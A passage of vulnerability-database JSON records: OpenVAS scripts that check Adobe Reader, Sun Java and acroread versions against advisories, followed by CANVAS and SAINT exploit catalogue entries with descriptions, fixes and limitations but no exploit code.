script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 SecPod\");\n script_family(\"Buffer overflow\");\n script_dependencies(\"gb_adobe_prdts_detect_lin.nasl\");\n script_mandatory_keys(\"Adobe/Reader/Linux/Version\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!readerVer = get_app_version(cpe:CPE))\n exit(0);\n\nif(readerVer =~ \"^[7-9]\\.\")\n{\n if(version_in_range(version:readerVer, test_version:\"7.0\", test_version2:\"7.1.0\")||\n version_in_range(version:readerVer, test_version:\"8.0\", test_version2:\"8.1.3\")||\n readerVer =~ \"^9\\.0\")\n {\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-27T19:23:02", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-0886", "CVE-2010-0887", "CVE-2010-1423"], "description": "This host is installed with Sun Java Deployment Toolkit and is prone to\n multiple vulnerabilities.", "modified": "2020-04-23T00:00:00", "published": "2010-04-23T00:00:00", "id": "OPENVAS:1361412562310902168", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310902168", "type": "openvas", "title": "Sun Java JRE Multiple Vulnerabilities (Linux)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Sun Java JRE Multiple Vulnerabilities (Linux)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2010 SecPod http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.902168\");\n script_version(\"2020-04-23T12:22:09+0000\");\n script_tag(name:\"last_modification\", value:\"2020-04-23 12:22:09 +0000 (Thu, 23 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2010-04-23 17:57:39 +0200 (Fri, 23 Apr 2010)\");\n script_cve_id(\"CVE-2010-0886\", \"CVE-2010-0887\", \"CVE-2010-1423\");\n script_bugtraq_id(39492);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Sun Java JRE Multiple Vulnerabilities (Linux)\");\n\n script_tag(name:\"qod_type\", value:\"executable_version_unreliable\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2010 SecPod\");\n script_family(\"General\");\n script_dependencies(\"gb_java_prdts_detect_lin.nasl\");\n script_mandatory_keys(\"Sun/Java/JRE/Linux/Ver\");\n script_tag(name:\"impact\", value:\"Successful exploitation allows execution of arbitrary code by tricking a user\n into visiting a malicious web page.\");\n script_tag(name:\"affected\", value:\"Sun Java version 6 Update 19 and prior on Linux.\");\n script_tag(name:\"insight\", value:\"The flaws are due to an input validation error in 'JRE' that does not\n properly validate arguments supplied via 'javaw.exe' before being passed to\n a 'CreateProcessA' call, which could allow remote attackers to automatically\n download and execute a malicious JAR file hosted on a network.\");\n script_tag(name:\"solution\", value:\"Upgrade to Sun Java version 6 Update 20.\");\n script_tag(name:\"summary\", value:\"This host is installed with Sun Java Deployment Toolkit and is prone to\n multiple vulnerabilities.\");\n script_xref(name:\"URL\", value:\"http://www.kb.cert.org/vuls/id/886582\");\n script_xref(name:\"URL\", value:\"http://www.vupen.com/english/advisories/2010/0853\");\n script_xref(name:\"URL\", value:\"http://lists.grok.org.uk/pipermail/full-disclosure/2010-April/074036.html\");\n script_xref(name:\"URL\", value:\"http://www.reversemode.com/index.php?option=com_content&task=view&id=67&Itemid=1\");\n script_xref(name:\"URL\", value:\"http://java.sun.com/javase/6/\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\njreVer = get_app_version(cpe:\"cpe:/a:sun:jre\");\nif(jreVer)\n{\n if(version_in_range(version:jreVer, test_version:\"1.6\", test_version2:\"1.6.0.19\")){\n report = report_fixed_ver(installed_version:jreVer, vulnerable_range:\"1.6 - 1.6.0.19\");\n security_message(port: 0, data: report);\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-11-13T12:48:25", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-0886", "CVE-2010-0887", "CVE-2010-1423"], "description": "This host is installed with Sun Java Deployment Toolkit and is prone to\n multiple vulnerabilities.", "modified": "2017-11-08T00:00:00", "published": "2010-04-23T00:00:00", "id": "OPENVAS:902167", "href": "http://plugins.openvas.org/nasl.php?oid=902167", "type": "openvas", "title": "Sun Java Deployment Toolkit Multiple Vulnerabilities (Windows)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_sun_java_jdk_mult_vuln_win_apr10.nasl 7699 2017-11-08 12:10:34Z santu $\n#\n# Sun Java Deployment Toolkit Multiple Vulnerabilities (Windows)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2010 SecPod http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_solution = \"Upgrade to Sun Java version 6 Update 20,\n For updates refer to http://java.sun.com/javase/6/\n\n Workaround:\n Set the killbit for the CLSID {CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA}\n http://support.microsoft.com/kb/240797\";\n\ntag_impact = \"Successful exploitation allows execution of arbitrary code by tricking a user\n into visiting a malicious web page.\n Impact Level: Application\";\ntag_affected = \"Sun Java version 6 Update 19 and prior on Windows.\";\ntag_insight = \"The flaws are due to input validation error in 'JDk' that does not properly\n validate arguments supplied via 'javaw.exe' before being passed to a\n 'CreateProcessA' call, which could allow remote attackers to automatially\n download and execute a malicious JAR file hosted on a network.\";\ntag_summary = \"This host is installed with Sun Java Deployment Toolkit and is prone to\n multiple vulnerabilities.\";\n\nif(description)\n{\n script_id(902167);\n script_version(\"$Revision: 7699 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-11-08 13:10:34 +0100 (Wed, 08 Nov 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-04-23 17:57:39 +0200 (Fri, 23 Apr 2010)\");\n script_cve_id(\"CVE-2010-0886\", \"CVE-2010-0887\", \"CVE-2010-1423\");\n script_bugtraq_id(39492);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Sun Java Deployment Toolkit Multiple Vulnerabilities (Windows)\");\n\n\n script_tag(name:\"qod_type\", value:\"registry\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 SecPod\");\n script_family(\"General\");\n script_dependencies(\"gb_java_prdts_detect_win.nasl\");\n script_require_keys(\"Sun/Java/JDK/Win/Ver\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"solution\" , value : tag_solution);\n script_xref(name : \"URL\" , value : \"http://www.kb.cert.org/vuls/id/886582\");\n script_xref(name : \"URL\" , value : \"http://www.vupen.com/english/advisories/2010/0853\");\n script_xref(name : \"URL\" , value : \"http://lists.grok.org.uk/pipermail/full-disclosure/2010-April/074036.html\");\n script_xref(name : \"URL\" , value : \"http://www.reversemode.com/index.php?option=com_content&task=view&id=67&Itemid=1\");\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\ninclude(\"secpod_activex.inc\");\n\n## Get KB for JDK Version On Windows\njdkVer = get_kb_item(\"Sun/Java/JDK/Win/Ver\");\nif(jdkVer)\n{\n ## Check for 1.6 < 1.6.0_19 (6 Update 19)\n if(version_in_range(version:jdkVer, test_version:\"1.6\", test_version2:\"1.6.0.19\")){\n security_message(0);\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-04-27T19:23:07", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-0886", "CVE-2010-0887", "CVE-2010-1423"], "description": "This host is installed with Sun Java Deployment Toolkit and is prone to\n multiple vulnerabilities.", "modified": "2020-04-23T00:00:00", "published": "2010-04-23T00:00:00", "id": "OPENVAS:1361412562310902167", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310902167", "type": "openvas", "title": "Sun Java Deployment Toolkit Multiple Vulnerabilities (Windows)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Sun Java Deployment Toolkit Multiple Vulnerabilities (Windows)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2010 SecPod http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.902167\");\n script_version(\"2020-04-23T12:22:09+0000\");\n script_tag(name:\"last_modification\", value:\"2020-04-23 12:22:09 +0000 (Thu, 23 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2010-04-23 17:57:39 +0200 (Fri, 23 Apr 2010)\");\n script_cve_id(\"CVE-2010-0886\", \"CVE-2010-0887\", \"CVE-2010-1423\");\n script_bugtraq_id(39492);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Sun Java Deployment Toolkit Multiple Vulnerabilities (Windows)\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2010 SecPod\");\n script_family(\"General\");\n script_dependencies(\"gb_java_prdts_detect_portable_win.nasl\");\n script_mandatory_keys(\"Sun/Java/JDK/Win/Ver\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation allows execution of arbitrary code by tricking a user\n into visiting a malicious web page.\");\n\n script_tag(name:\"affected\", value:\"Sun Java version 6 Update 19 and prior on Windows.\");\n\n script_tag(name:\"insight\", value:\"The flaws are due to input validation error in 'JDk' that does not properly\n validate arguments supplied via 'javaw.exe' before being passed to a\n 'CreateProcessA' call, which could allow remote attackers to automatically\n download and execute a malicious JAR file hosted on a network.\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Sun Java Deployment Toolkit and is prone to\n multiple vulnerabilities.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Sun Java version 6 Update 20.\n\n Workaround:\n Set the killbit for the CLSID {CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA}.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"http://www.kb.cert.org/vuls/id/886582\");\n script_xref(name:\"URL\", value:\"http://www.vupen.com/english/advisories/2010/0853\");\n script_xref(name:\"URL\", value:\"http://lists.grok.org.uk/pipermail/full-disclosure/2010-April/074036.html\");\n script_xref(name:\"URL\", value:\"http://www.reversemode.com/index.php?option=com_content&task=view&id=67&Itemid=1\");\n script_xref(name:\"URL\", value:\"http://java.sun.com/javase/6/\");\n script_xref(name:\"URL\", value:\"http://support.microsoft.com/kb/240797\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"secpod_activex.inc\");\n\njdkVer = get_kb_item(\"Sun/Java/JDK/Win/Ver\");\nif(jdkVer)\n{\n if(version_in_range(version:jdkVer, test_version:\"1.6\", test_version2:\"1.6.0.19\")){\n report = report_fixed_ver(installed_version:jdkVer, vulnerable_range:\"1.6 - 1.6.0.19\");\n security_message(port: 0, data: report);\n exit(0);\n }\n}\n\nexit(99);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-26T08:55:56", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-0928", "CVE-2009-0658", "CVE-2009-0927", "CVE-2009-0193", "CVE-2009-1062", "CVE-2009-1061"], "description": "The remote host is missing updates announced in\nadvisory SUSE-SA:2009:014.", "modified": "2017-07-11T00:00:00", "published": "2009-03-31T00:00:00", "id": "OPENVAS:63686", "href": "http://plugins.openvas.org/nasl.php?oid=63686", "type": "openvas", "title": "SuSE Security Advisory SUSE-SA:2009:014 (acroread)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: suse_sa_2009_014.nasl 6668 2017-07-11 13:34:29Z cfischer $\n# Description: Auto-generated from advisory SUSE-SA:2009:014 (acroread)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Multiple flaws in the JBIG2 decoder and the JavaScript engine of the\nAdobe Reader allowed attackers to crash acroread or even execute\narbitrary code by tricking users into opening specially crafted PDF\nfiles.\n\nPlease find more details at Adobe's site:\nhttp://www.adobe.com/support/security/bulletins/apsb09-04.html\n\nNote that Adobe did not provide updates for Adobe Reader 7 as used\non NLD9. We cannot upgrade to newer versions due to library\ndependencies. We strongly encourage users of acroread on NLD9 to\nuninstall the package and to use an alternative, open source pdf\nviewer instead. We're currently evaluating the possibility of\ndisabling acroread on NLD9 via online update.\";\ntag_solution = \"Update your system with the packages as indicated in\nthe referenced security advisory.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=SUSE-SA:2009:014\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory SUSE-SA:2009:014.\";\n\n \n\nif(description)\n{\n script_id(63686);\n script_version(\"$Revision: 6668 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-11 15:34:29 +0200 (Tue, 11 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-03-31 19:20:21 +0200 (Tue, 31 Mar 2009)\");\n script_cve_id(\"CVE-2009-0193\", \"CVE-2009-0658\", \"CVE-2009-0927\", \"CVE-2009-0928\", \"CVE-2009-1061\", \"CVE-2009-1062\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"SuSE Security Advisory SUSE-SA:2009:014 (acroread)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"acroread\", rpm:\"acroread~8.1.4~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"acroread\", rpm:\"acroread~8.1.4~0.1\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"acroread\", rpm:\"acroread~8.1.4~0.1\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:56:52", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-0928", "CVE-2009-0658", "CVE-2009-0927", "CVE-2009-0193", "CVE-2009-1062", "CVE-2009-1061"], "description": "The remote host is missing updates announced in\nadvisory GLSA 200904-17.", "modified": "2017-07-07T00:00:00", "published": "2009-04-20T00:00:00", "id": "OPENVAS:63853", "href": "http://plugins.openvas.org/nasl.php?oid=63853", "type": "openvas", "title": "Gentoo Security Advisory GLSA 200904-17 (acroread)", "sourceData": "#\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Adobe Reader is vulnerable to execution of arbitrary code.\";\ntag_solution = \"All Adobe Reader users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=app-text/acroread-8.1.4'\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200904-17\nhttp://bugs.gentoo.org/show_bug.cgi?id=259992\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200904-17.\";\n\n \n \n\nif(description)\n{\n script_id(63853);\n script_version(\"$Revision: 6595 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:19:55 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-04-20 23:45:17 +0200 (Mon, 20 Apr 2009)\");\n script_cve_id(\"CVE-2009-0193\", \"CVE-2009-0658\", \"CVE-2009-0927\", \"CVE-2009-0928\", \"CVE-2009-1061\", \"CVE-2009-1062\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Gentoo Security Advisory GLSA 200904-17 (acroread)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"app-text/acroread\", unaffected: make_list(\"ge 8.1.4\"), vulnerable: make_list(\"lt 8.1.4\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "canvas": [{"lastseen": "2019-05-29T17:19:20", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-1885"], "description": "**Name**| ie_hcp \n---|--- \n**CVE**| CVE-2010-1885 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| ie_hcp \n**Notes**| CVE Name: CVE-2010-1885 \nVENDOR: Microsoft \nNotes: http://www.microsoft.com/technet/security/Bulletin/MS10-042.mspx \nRepeatability: Infinite \nMSADV: MS10-042 \nDate public: 06/09/2010 \nCVE Url: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1885 \nCVSS: 9.3 \n\n", "edition": 2, "modified": "2010-06-15T14:04:00", "published": "2010-06-15T14:04:00", "id": "IE_HCP", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/ie_hcp", "type": "canvas", "title": "Immunity Canvas: IE_HCP", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T17:19:23", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-0927"], "description": "**Name**| acrobat_js4 \n---|--- \n**CVE**| CVE-2009-0927 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| acrobat_js4 \n**Notes**| CVE Name: CVE-2009-0927 \nVersionsAffected: Acrobat Reader <=8.1.2 and <=9.0 \nRepeatability: \nReferences: http://www.adobe.com/support/security/bulletins/apsb09-04.html \nDate public: 03/24/2009 \nCVE Url: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0927 \n\n", "edition": 2, "modified": "2009-03-19T10:30:00", "published": "2009-03-19T10:30:00", "id": "ACROBAT_JS4", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/acrobat_js4", "type": "canvas", "title": "Immunity Canvas: ACROBAT_JS4", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T17:19:25", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-0003"], "description": "**Name**| ms06_014 \n---|--- \n**CVE**| CVE-2006-0003 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| RDS Datastore (MS06-014) \n**Notes**| CVE Name: CVE-2006-0003 \nVENDOR: Microsoft \nMSADV: MS06-014 \nRepeatability: Infinite (client side - no crash) \nMSRC: http://www.microsoft.com/technet/security/Bulletin/MS06-014.mspx \nCVE Url: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVS-2006-0003 \nDate public: 4/11/2006 \nCVSS: 5.1 \n\n", "edition": 2, "modified": "2006-04-12T00:02:00", "published": "2006-04-12T00:02:00", "id": "MS06_014", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/ms06_014", "type": "canvas", "title": "Immunity Canvas: MS06_014", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}], "saint": [{"lastseen": "2019-06-04T23:19:36", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-1885"], "description": "Added: 06/15/2010 \nCVE: [CVE-2010-1885](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1885>) \nBID: [40725](<http://www.securityfocus.com/bid/40725>) \nOSVDB: [65264](<http://www.osvdb.org/65264>) \n\n\n### Background\n\nThe [Microsoft Windows Help and Support Center](<http://technet.microsoft.com/en-us/library/bb457022.aspx>) is a resource in Microsoft Windows operating systems for online help, support, tools, how-to articles, and other resources. \n\n### Problem\n\nA vulnerability in Windows Help and Support Center allows command execution when a user loads a specially crafted HCP URL resulting in a bypass of the whitelist restrictions provided by the `**-FromHCP**` option. \n\n### Resolution\n\nApply the fix referenced in [Microsoft Security Bulletin 10-042](<http://www.microsoft.com/technet/security/bulletin/ms10-042.mspx>). \n\n### References\n\n<http://www.kb.cert.org/vuls/id/578319> \n<http://www.securityfocus.com/archive/1/511774> \n\n\n### Limitations\n\nExploit works on Windows XP SP3 and requires a user to open the exploit page in Internet Explorer. \n\nInternet Explorer 8 will pop up security prompts during the exploiting process asking permissions for execution operations. The target user must grant these operations. \n\nExploit requires the ability to bind to port 69/UDP on the SAINTexploit host. \n\n### Platforms\n\nWindows XP \n \n\n", "edition": 4, "modified": "2010-06-15T00:00:00", "published": "2010-06-15T00:00:00", "id": "SAINT:500F83833D8CE812FA9B6A3B0F45786C", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/windows_helpctr_fromhcp_whitelist_bypass", "title": "Windows Help and Support Center -FromHCP URL whitelist bypass", "type": "saint", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T17:19:52", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-1885"], "edition": 2, "description": "Added: 06/15/2010 \nCVE: [CVE-2010-1885](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1885>) \nBID: [40725](<http://www.securityfocus.com/bid/40725>) \nOSVDB: [65264](<http://www.osvdb.org/65264>) \n\n\n### Background\n\nThe [Microsoft Windows Help and Support Center](<http://technet.microsoft.com/en-us/library/bb457022.aspx>) is a resource in Microsoft Windows operating systems for online help, support, tools, how-to articles, and other resources. \n\n### Problem\n\nA vulnerability in Windows Help and Support Center allows command execution when a user loads a specially crafted HCP URL resulting in a bypass of the whitelist restrictions provided by the `**-FromHCP**` option. \n\n### Resolution\n\nApply the fix referenced in [Microsoft Security Bulletin 10-042](<http://www.microsoft.com/technet/security/bulletin/ms10-042.mspx>). \n\n### References\n\n<http://www.kb.cert.org/vuls/id/578319> \n<http://www.securityfocus.com/archive/1/511774> \n\n\n### Limitations\n\nExploit works on Windows XP SP3 and requires a user to open the exploit page in Internet Explorer. \n\nInternet Explorer 8 will pop up security prompts during the exploiting process asking permissions for execution operations. The target user must grant these operations. \n\nExploit requires the ability to bind to port 69/UDP on the SAINTexploit host. \n\n### Platforms\n\nWindows XP \n \n\n", "modified": "2010-06-15T00:00:00", "published": "2010-06-15T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/windows_helpctr_fromhcp_whitelist_bypass", "id": "SAINT:3B46CFB2D4C3EBFC228A16FC6CC49E11", "type": "saint", "title": "Windows Help and Support Center -FromHCP URL whitelist bypass", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2016-10-03T15:01:54", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-1885"], "description": "Added: 06/15/2010 \nCVE: [CVE-2010-1885](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1885>) \nBID: [40725](<http://www.securityfocus.com/bid/40725>) \nOSVDB: [65264](<http://www.osvdb.org/65264>) \n\n\n### Background\n\nThe [Microsoft Windows Help and Support Center](<http://technet.microsoft.com/en-us/library/bb457022.aspx>) is a resource in Microsoft Windows operating systems for online help, support, tools, how-to articles, and other resources. \n\n### Problem\n\nA vulnerability in Windows Help and Support Center allows command execution when a user loads a specially crafted HCP URL resulting in a bypass of the whitelist restrictions provided by the `**-FromHCP**` option. \n\n### Resolution\n\nApply the fix referenced in [Microsoft Security Bulletin 10-042](<http://www.microsoft.com/technet/security/bulletin/ms10-042.mspx>). \n\n### References\n\n<http://www.kb.cert.org/vuls/id/578319> \n<http://www.securityfocus.com/archive/1/511774> \n\n\n### Limitations\n\nExploit works on Windows XP SP3 and requires a user to open the exploit page in Internet Explorer. \n\nInternet Explorer 8 will pop up security prompts during the exploiting process asking permissions for execution operations. The target user must grant these operations. \n\nExploit requires the ability to bind to port 69/UDP on the SAINTexploit host. \n\n### Platforms\n\nWindows XP \n \n\n", "edition": 1, "modified": "2010-06-15T00:00:00", "published": "2010-06-15T00:00:00", "id": "SAINT:F159D63C4ABD84C60A4DEC50BD8A348D", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/windows_helpctr_fromhcp_whitelist_bypass", "type": "saint", "title": "Windows Help and Support Center -FromHCP URL whitelist bypass", "cvss": {"score": 9.3, "vector": 